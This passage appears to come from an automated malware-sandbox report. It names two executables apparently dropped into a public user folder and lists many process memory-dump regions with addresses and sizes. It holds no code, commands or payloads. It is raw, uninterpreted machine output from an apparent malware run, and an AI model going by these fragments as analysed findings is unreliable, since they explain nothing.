                      • \Users\Public\jow.exe
                      • \Users\Public\tob.exe
                      • memory/296-338-0x00000000000D0000-0x00000000000D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/296-349-0x00000000004B0000-0x00000000004B5000-memory.dmp
                        Filesize

                        20KB

                      • memory/296-348-0x0000000000380000-0x0000000000392000-memory.dmp
                        Filesize

                        72KB

                      • memory/296-331-0x0000000000000000-mapping.dmp
                      • memory/296-351-0x0000000004C10000-0x0000000004C12000-memory.dmp
                        Filesize

                        8KB

                      • memory/296-344-0x0000000000210000-0x0000000000211000-memory.dmp
                        Filesize

                        4KB

                      • memory/296-357-0x0000000004C10000-0x0000000004C12000-memory.dmp
                        Filesize

                        8KB

                      • memory/296-334-0x00000000726B0000-0x0000000072D9E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/308-0-0x0000000000000000-mapping.dmp
                      • memory/524-355-0x0000000000000000-mapping.dmp
                      • memory/532-4-0x0000000000000000-mapping.dmp
                      • memory/532-5-0x0000000000000000-mapping.dmp
                      • memory/664-22-0x0000000000000000-mapping.dmp
                      • memory/664-34-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/664-50-0x0000000002690000-0x0000000002691000-memory.dmp
                        Filesize

                        4KB

                      • memory/664-143-0x0000000006680000-0x0000000006681000-memory.dmp
                        Filesize

                        4KB

                      • memory/664-36-0x00000000024E0000-0x00000000024E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/676-27-0x0000000000000000-mapping.dmp
                      • memory/960-276-0x0000000000000000-mapping.dmp
                      • memory/1180-634-0x0000000000000000-mapping.dmp
                      • memory/1344-56-0x00000000054F0000-0x00000000054F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1344-35-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1344-23-0x0000000000000000-mapping.dmp
                      • memory/1380-29-0x0000000000000000-mapping.dmp
                      • memory/1548-8-0x0000000000000000-mapping.dmp
                      • memory/1564-291-0x0000000000000000-mapping.dmp
                      • memory/1564-295-0x0000000071070000-0x000000007175E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1564-296-0x0000000001000000-0x0000000001001000-memory.dmp
                        Filesize

                        4KB

                      • memory/1564-298-0x00000000005C0000-0x00000000005C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1564-313-0x0000000000A20000-0x0000000000A44000-memory.dmp
                        Filesize

                        144KB

                      • memory/1576-343-0x0000000000B00000-0x0000000000B01000-memory.dmp
                        Filesize

                        4KB

                      • memory/1576-342-0x00000000726B0000-0x0000000072D9E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1576-358-0x00000000006F0000-0x00000000006F3000-memory.dmp
                        Filesize

                        12KB

                      • memory/1576-336-0x0000000000000000-mapping.dmp
                      • memory/1576-347-0x0000000000270000-0x0000000000271000-memory.dmp
                        Filesize

                        4KB

                      • memory/1576-350-0x0000000000380000-0x0000000000391000-memory.dmp
                        Filesize

                        68KB

                      • memory/1580-38-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1580-31-0x0000000000000000-mapping.dmp
                      • memory/1580-44-0x0000000004C50000-0x0000000004C51000-memory.dmp
                        Filesize

                        4KB

                      • memory/1584-15-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1584-13-0x0000000000000000-mapping.dmp
                      • memory/1584-70-0x00000000058A0000-0x00000000058A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1584-77-0x0000000006390000-0x0000000006391000-memory.dmp
                        Filesize

                        4KB

                      • memory/1584-85-0x0000000006440000-0x0000000006441000-memory.dmp
                        Filesize

                        4KB

                      • memory/1584-64-0x0000000005760000-0x0000000005761000-memory.dmp
                        Filesize

                        4KB

                      • memory/1584-69-0x0000000005840000-0x0000000005841000-memory.dmp
                        Filesize

                        4KB

                      • memory/1608-249-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/1608-250-0x000000000043FCC3-mapping.dmp
                      • memory/1608-253-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/1620-304-0x0000000000000000-mapping.dmp
                      • memory/1644-305-0x0000000000000000-mapping.dmp
                      • memory/1644-173-0x00000000065E0000-0x00000000065E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1644-16-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1644-181-0x00000000063C0000-0x00000000063C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1644-12-0x0000000000000000-mapping.dmp
                      • memory/1644-194-0x0000000006430000-0x0000000006431000-memory.dmp
                        Filesize

                        4KB

                      • memory/1644-211-0x00000000065C0000-0x00000000065C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1644-212-0x00000000066B0000-0x00000000066B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1676-10-0x0000000000000000-mapping.dmp
                      • memory/1748-337-0x0000000000000000-mapping.dmp
                      • memory/1780-637-0x0000000000000000-mapping.dmp
                      • memory/1780-635-0x0000000000000000-mapping.dmp
                      • memory/1780-629-0x00000000000D0000-0x00000000000D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1780-640-0x0000000000200000-0x0000000000201000-memory.dmp
                        Filesize

                        4KB

                      • memory/1780-630-0x0000000000000000-mapping.dmp
                      • memory/1780-633-0x0000000000110000-0x0000000000111000-memory.dmp
                        Filesize

                        4KB

                      • memory/1780-641-0x0000000000000000-mapping.dmp
                      • memory/1796-11-0x0000000000000000-mapping.dmp
                      • memory/1832-39-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1832-275-0x0000000000000000-mapping.dmp
                      • memory/1832-151-0x00000000065A0000-0x00000000065A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1832-30-0x0000000000000000-mapping.dmp
                      • memory/1836-247-0x0000000000000000-mapping.dmp
                      • memory/1836-270-0x00000000026E0000-0x00000000026E4000-memory.dmp
                        Filesize

                        16KB

                      • memory/1912-272-0x00000000010C0000-0x00000000010C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1912-274-0x00000000002F0000-0x00000000002F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1912-280-0x00000000006D0000-0x0000000000721000-memory.dmp
                        Filesize

                        324KB

                      • memory/1912-271-0x00000000728E0000-0x0000000072FCE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1912-268-0x0000000000000000-mapping.dmp
                      • memory/1916-20-0x0000000000000000-mapping.dmp
                      • memory/1932-363-0x00000000726B0000-0x0000000072D9E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1932-367-0x0000000005420000-0x0000000005421000-memory.dmp
                        Filesize

                        4KB

                      • memory/1932-361-0x0000000000000000-mapping.dmp
                      • memory/1932-364-0x0000000000C50000-0x0000000000C51000-memory.dmp
                        Filesize

                        4KB

                      • memory/1932-365-0x0000000004980000-0x0000000004981000-memory.dmp
                        Filesize

                        4KB

                      • memory/1932-366-0x0000000004910000-0x0000000004911000-memory.dmp
                        Filesize

                        4KB

                      • memory/1952-18-0x0000000000000000-mapping.dmp
                      • memory/1972-21-0x0000000000000000-mapping.dmp
                      • memory/2016-325-0x0000000001240000-0x0000000001241000-memory.dmp
                        Filesize

                        4KB

                      • memory/2016-374-0x0000000000600000-0x0000000000624000-memory.dmp
                        Filesize

                        144KB

                      • memory/2016-321-0x0000000000000000-mapping.dmp
                      • memory/2016-324-0x00000000726B0000-0x0000000072D9E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2016-372-0x00000000003B0000-0x00000000003D3000-memory.dmp
                        Filesize

                        140KB

                      • memory/2052-632-0x0000000000000000-mapping.dmp
                      • memory/2164-277-0x0000000000000000-mapping.dmp
                      • memory/2176-160-0x0000000000000000-mapping.dmp
                      • memory/2220-525-0x0000000000000000-mapping.dmp
                      • memory/2220-493-0x0000000000000000-mapping.dmp
                      • memory/2220-278-0x0000000000000000-mapping.dmp
                      • memory/2220-625-0x0000000003C40000-0x0000000003C41000-memory.dmp
                        Filesize

                        4KB

                      • memory/2220-626-0x0000000000000000-mapping.dmp
                      • memory/2220-623-0x0000000000000000-mapping.dmp
                      • memory/2220-621-0x0000000000000000-mapping.dmp
                      • memory/2220-619-0x0000000000000000-mapping.dmp
                      • memory/2220-617-0x0000000000000000-mapping.dmp
                      • memory/2220-615-0x0000000000000000-mapping.dmp
                      • memory/2220-613-0x0000000000000000-mapping.dmp
                      • memory/2220-611-0x0000000000000000-mapping.dmp
                      • memory/2220-609-0x0000000000000000-mapping.dmp
                      • memory/2220-607-0x0000000000000000-mapping.dmp
                      • memory/2220-605-0x0000000000000000-mapping.dmp
                      • memory/2220-603-0x0000000000000000-mapping.dmp
                      • memory/2220-601-0x0000000000000000-mapping.dmp
                      • memory/2220-599-0x0000000000000000-mapping.dmp
                      • memory/2220-597-0x0000000000000000-mapping.dmp
                      • memory/2220-595-0x0000000000000000-mapping.dmp
                      • memory/2220-593-0x0000000000000000-mapping.dmp
                      • memory/2220-591-0x0000000000000000-mapping.dmp
                      • memory/2220-589-0x0000000000000000-mapping.dmp
                      • memory/2220-587-0x0000000000000000-mapping.dmp
                      • memory/2220-585-0x0000000000000000-mapping.dmp
                      • memory/2220-583-0x0000000000000000-mapping.dmp
                      • memory/2220-581-0x0000000000000000-mapping.dmp
                      • memory/2220-579-0x0000000000000000-mapping.dmp
                      • memory/2220-577-0x0000000000000000-mapping.dmp
                      • memory/2220-384-0x00000000000A0000-0x00000000000A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2220-385-0x0000000000000000-mapping.dmp
                      • memory/2220-386-0x00000000000E0000-0x00000000000E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2220-387-0x0000000000000000-mapping.dmp
                      • memory/2220-389-0x0000000000000000-mapping.dmp
                      • memory/2220-391-0x0000000000000000-mapping.dmp
                      • memory/2220-393-0x0000000000000000-mapping.dmp
                      • memory/2220-395-0x0000000000000000-mapping.dmp
                      • memory/2220-397-0x0000000000000000-mapping.dmp
                      • memory/2220-399-0x0000000000000000-mapping.dmp
                      • memory/2220-401-0x0000000000000000-mapping.dmp
                      • memory/2220-403-0x0000000000000000-mapping.dmp
                      • memory/2220-405-0x0000000000000000-mapping.dmp
                      • memory/2220-407-0x0000000000000000-mapping.dmp
                      • memory/2220-409-0x0000000000000000-mapping.dmp
                      • memory/2220-411-0x0000000000000000-mapping.dmp
                      • memory/2220-413-0x0000000000000000-mapping.dmp
                      • memory/2220-415-0x0000000000000000-mapping.dmp
                      • memory/2220-417-0x0000000000000000-mapping.dmp
                      • memory/2220-419-0x0000000000000000-mapping.dmp
                      • memory/2220-421-0x0000000000000000-mapping.dmp
                      • memory/2220-423-0x0000000000000000-mapping.dmp
                      • memory/2220-425-0x0000000000000000-mapping.dmp
                      • memory/2220-427-0x0000000000000000-mapping.dmp
                      • memory/2220-429-0x0000000000000000-mapping.dmp
                      • memory/2220-431-0x0000000000000000-mapping.dmp
                      • memory/2220-433-0x0000000000000000-mapping.dmp
                      • memory/2220-435-0x0000000000000000-mapping.dmp
                      • memory/2220-437-0x0000000000000000-mapping.dmp
                      • memory/2220-439-0x0000000000000000-mapping.dmp
                      • memory/2220-441-0x0000000000000000-mapping.dmp
                      • memory/2220-443-0x0000000000000000-mapping.dmp
                      • memory/2220-445-0x0000000000000000-mapping.dmp
                      • memory/2220-447-0x0000000000000000-mapping.dmp
                      • memory/2220-449-0x0000000000000000-mapping.dmp
                      • memory/2220-451-0x0000000000000000-mapping.dmp
                      • memory/2220-453-0x0000000000000000-mapping.dmp
                      • memory/2220-455-0x0000000000000000-mapping.dmp
                      • memory/2220-457-0x0000000000000000-mapping.dmp
                      • memory/2220-459-0x0000000000000000-mapping.dmp
                      • memory/2220-461-0x0000000000000000-mapping.dmp
                      • memory/2220-463-0x0000000000000000-mapping.dmp
                      • memory/2220-465-0x0000000000000000-mapping.dmp
                      • memory/2220-467-0x0000000000000000-mapping.dmp
                      • memory/2220-469-0x0000000000000000-mapping.dmp
                      • memory/2220-471-0x0000000000000000-mapping.dmp
                      • memory/2220-473-0x0000000000000000-mapping.dmp
                      • memory/2220-475-0x0000000000000000-mapping.dmp
                      • memory/2220-477-0x0000000000000000-mapping.dmp
                      • memory/2220-479-0x0000000000000000-mapping.dmp
                      • memory/2220-481-0x0000000000000000-mapping.dmp
                      • memory/2220-483-0x0000000000000000-mapping.dmp
                      • memory/2220-485-0x0000000000000000-mapping.dmp
                      • memory/2220-487-0x0000000000000000-mapping.dmp
                      • memory/2220-489-0x0000000000000000-mapping.dmp
                      • memory/2220-491-0x0000000000000000-mapping.dmp
                      • memory/2220-575-0x0000000000000000-mapping.dmp
                      • memory/2220-495-0x0000000000000000-mapping.dmp
                      • memory/2220-497-0x0000000000000000-mapping.dmp
                      • memory/2220-499-0x0000000000000000-mapping.dmp
                      • memory/2220-501-0x0000000000000000-mapping.dmp
                      • memory/2220-503-0x0000000000000000-mapping.dmp
                      • memory/2220-505-0x0000000000000000-mapping.dmp
                      • memory/2220-507-0x0000000000000000-mapping.dmp
                      • memory/2220-509-0x0000000000000000-mapping.dmp
                      • memory/2220-511-0x0000000000000000-mapping.dmp
                      • memory/2220-513-0x0000000000000000-mapping.dmp
                      • memory/2220-515-0x0000000000000000-mapping.dmp
                      • memory/2220-517-0x0000000000000000-mapping.dmp
                      • memory/2220-519-0x0000000000000000-mapping.dmp
                      • memory/2220-521-0x0000000000000000-mapping.dmp
                      • memory/2220-523-0x0000000000000000-mapping.dmp
                      • memory/2220-573-0x0000000000000000-mapping.dmp
                      • memory/2220-527-0x0000000000000000-mapping.dmp
                      • memory/2220-529-0x0000000000000000-mapping.dmp
                      • memory/2220-531-0x0000000000000000-mapping.dmp
                      • memory/2220-533-0x0000000000000000-mapping.dmp
                      • memory/2220-535-0x0000000000000000-mapping.dmp
                      • memory/2220-537-0x0000000000000000-mapping.dmp
                      • memory/2220-539-0x0000000000000000-mapping.dmp
                      • memory/2220-541-0x0000000000000000-mapping.dmp
                      • memory/2220-543-0x0000000000000000-mapping.dmp
                      • memory/2220-545-0x0000000000000000-mapping.dmp
                      • memory/2220-547-0x0000000000000000-mapping.dmp
                      • memory/2220-549-0x0000000000000000-mapping.dmp
                      • memory/2220-551-0x0000000000000000-mapping.dmp
                      • memory/2220-553-0x0000000000000000-mapping.dmp
                      • memory/2220-555-0x0000000000000000-mapping.dmp
                      • memory/2220-557-0x0000000000000000-mapping.dmp
                      • memory/2220-559-0x0000000000000000-mapping.dmp
                      • memory/2220-561-0x0000000000000000-mapping.dmp
                      • memory/2220-563-0x0000000000000000-mapping.dmp
                      • memory/2220-565-0x0000000000000000-mapping.dmp
                      • memory/2220-567-0x0000000000000000-mapping.dmp
                      • memory/2220-569-0x0000000000000000-mapping.dmp
                      • memory/2220-571-0x0000000000000000-mapping.dmp
                      • memory/2228-164-0x0000000000000000-mapping.dmp
                      • memory/2276-628-0x0000000000000000-mapping.dmp
                      • memory/2296-167-0x000000000043FCC3-mapping.dmp
                      • memory/2368-187-0x0000000000417A8B-mapping.dmp
                      • memory/2408-282-0x0000000000000000-mapping.dmp
                      • memory/2408-293-0x0000000002670000-0x0000000002674000-memory.dmp
                        Filesize

                        16KB

                      • memory/2412-195-0x000000000041A684-mapping.dmp
                      • memory/2484-286-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/2484-292-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/2484-287-0x0000000000417A8B-mapping.dmp
                      • memory/2520-378-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2520-373-0x0000000000000000-mapping.dmp
                      • memory/2520-377-0x00000000024E0000-0x00000000024E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2520-379-0x0000000002740000-0x0000000002741000-memory.dmp
                        Filesize

                        4KB

                      • memory/2520-380-0x0000000005440000-0x0000000005441000-memory.dmp
                        Filesize

                        4KB

                      • memory/2520-376-0x00000000726B0000-0x0000000072D9E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2544-638-0x0000000000000000-mapping.dmp
                      • memory/2580-104-0x0000000000000000-mapping.dmp
                      • memory/2616-108-0x000007FEF7720000-0x000007FEF799A000-memory.dmp
                        Filesize

                        2.5MB

                      • memory/2664-111-0x0000000000000000-mapping.dmp
                      • memory/2684-114-0x0000000000000000-mapping.dmp
                      • memory/2712-624-0x0000000050480000-0x000000005049A000-memory.dmp
                        Filesize

                        104KB

                      • memory/2712-328-0x0000000000000000-mapping.dmp
                      • memory/2712-639-0x0000000010530000-0x000000001054A000-memory.dmp
                        Filesize

                        104KB

                      • memory/2712-383-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                        Filesize

                        304KB

                      • memory/2736-122-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/2736-123-0x000000000043FCC3-mapping.dmp
                      • memory/2736-128-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/2748-316-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/2748-317-0x000000000041A684-mapping.dmp
                      • memory/2748-319-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/2756-134-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/2756-126-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/2756-131-0x000000000041A684-mapping.dmp
                      • memory/2780-132-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/2780-135-0x0000000000417A8B-mapping.dmp
                      • memory/2780-137-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/3000-145-0x0000000000000000-mapping.dmp
                      • memory/3000-148-0x0000000071040000-0x000000007172E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3000-149-0x0000000000CD0000-0x0000000000CD1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3000-241-0x0000000004BC0000-0x0000000004C70000-memory.dmp
                        Filesize

                        704KB

                      • memory/3000-248-0x0000000000B90000-0x0000000000B9D000-memory.dmp
                        Filesize

                        52KB

                      • memory/3032-346-0x0000000000000000-mapping.dmp
                      • memory/3068-154-0x0000000000000000-mapping.dmp